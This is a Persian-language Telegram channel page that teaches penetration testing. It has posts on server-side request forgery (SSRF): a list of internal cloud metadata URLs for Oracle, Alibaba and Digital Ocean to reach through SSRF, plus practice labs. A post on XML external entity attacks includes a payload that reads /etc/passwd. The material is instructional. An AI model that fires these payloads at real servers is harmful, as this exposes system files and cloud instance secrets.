Try Hack Box
5.9K subscribers
685 photos
65 videos
125 files
692 links
1 Nov 2020
1399/08/11
آموزش تست نفوذ و ردتیم

https://linkedin.com/company/tryhackbox-org/

یوتیوب
https://youtube.com/@tryhackbox

کانال ها :
@TryHackBoxOfficial ( نقشه راه )
@TryHackBoxStory ( اخبار و داستانهای هک )
پشتیبانی : @ThbxSupport
Download Telegram
☁️ آدرس منابع ابری برای دسترسی از طریق SSRF

هنگامی که SSRF را پیدا کردید، قدم بعدی شما این است که سعی کنید به منابع داخلی دسترسی داشته باشید و چیزی ارزشمند را در آنجا پیدا کنید.

و اگر نمونه ها و مقالات بسیار زیادی برای AWS وجود دارد، پس با سایر منابع ابری چه باید کرد؟ در زیر لیستی از URLهای جالب برای Oracle Cloud، Alibaba و Digital Ocean آمده است.

Oracle Cloud:

https://192.0.0.192/latest/
https://192.0.0.192/latest/user-data/
https://192.0.0.192/latest/meta-data/
https://192.0.0.192/latest/attributes/

Alibaba :

https://100.100.100.200/latest/meta-data/
https://100.100.100.200/latest/meta-data/instance-id
https://100.100.100.200/latest/meta-data/image-id

Digital Ocean :

https://169.254.169.254/metadata/v1.json
https://169.254.169.254/metadata/v1/
https://169.254.169.254/metadata/v1/id
https://169.254.169.254/metadata/v1/user-data
https://169.254.169.254/metadata/v1/hostname
https://169.254.169.254/metadata/v1/region
https://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address

#Web #SSRF #Cloud
@TryHackBox
@TryHackBoxOfficial
🔥3
🔬 آزمایشگاه های رایگان برای تمرین عملیات SSRF

این لیست شامل آزمایشگاه‌های آنلاین و آزمایشگاه‌هایی است که می‌توانید در محیط آزمایشی خودتان اجرا کنید.

🗄 PortSwigger SSRF Labs
🗄 Server-Side Request Forgery (SSRF) vulnerable Lab
🗄 Vulnado SSRF Lab
🗄 Snyk SSRF Lab
🗄 Kontra SSRF Lab

#Web #SSRF
@TryHackBox
@TryHackBoxOfficial
👍3
Media is too big
VIEW IN TELEGRAM
🏃‍♂️ روش SSRF .

جریانی از KathanP19 ، اختصاص داده شده به روش جستجوی آسیب‌پذیری‌های SSRF در حالت دستی و خودکار.

جعل درخواست سمت سرور (SSRF) نوعی آسیب پذیری برنامه وب است که به مهاجم اجازه می دهد درخواست های HTTP دلخواه را از یک برنامه وب آسیب پذیر به یک سرور خارجی ارسال کند. یک برنامه را می توان فریب داد تا درخواست های مخرب را به سیستم های داخلی ارسال کند که می تواند منجر به افشای داده های حساس یا سایر مسائل امنیتی شود.

#SSRF #Web
@TryHackBox
@TryHackBoxOfficial
👍5
📌 حملات XXE (تزریق XML) - بخش اول

🔹حمله XXE چیست؟
حملۀ XXE (XML External Entity Injection) یک آسیب‌پذیری امنیتی در پردازش داده‌های XML است که به مهاجم اجازه می‌دهد به فایل‌های سیستم سرور دسترسی پیدا کند یا با سیستم‌های backend تعامل داشته باشد. در برخی موارد، این آسیب‌پذیری می‌تواند منجر به حمله‌های جعل درخواست سمت سرور (SSRF) یا حتی اختلال در سرویس (DoS) شود.

🔹 انواع حملات XXE
1. استخراج فایل‌ها (مثلاً خواندن /etc/passwd)
2. حملات SSRF (ارسال درخواست به سیستم‌های داخلی)
3. انتقال داده‌ها به صورت خارج از باند (OOB)
4. استخراج داده از طریق پیام‌های خطا

🔹 مثال ساده از XXE:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

در این مثال، مهاجم محتوای فایل /etc/passwd را می‌خواند.

ادامه در بخش بعدی...

✍️نویسنده
@TryHackBox | The Chaos

#XXE #SSRF #CyberSecurity
🔥41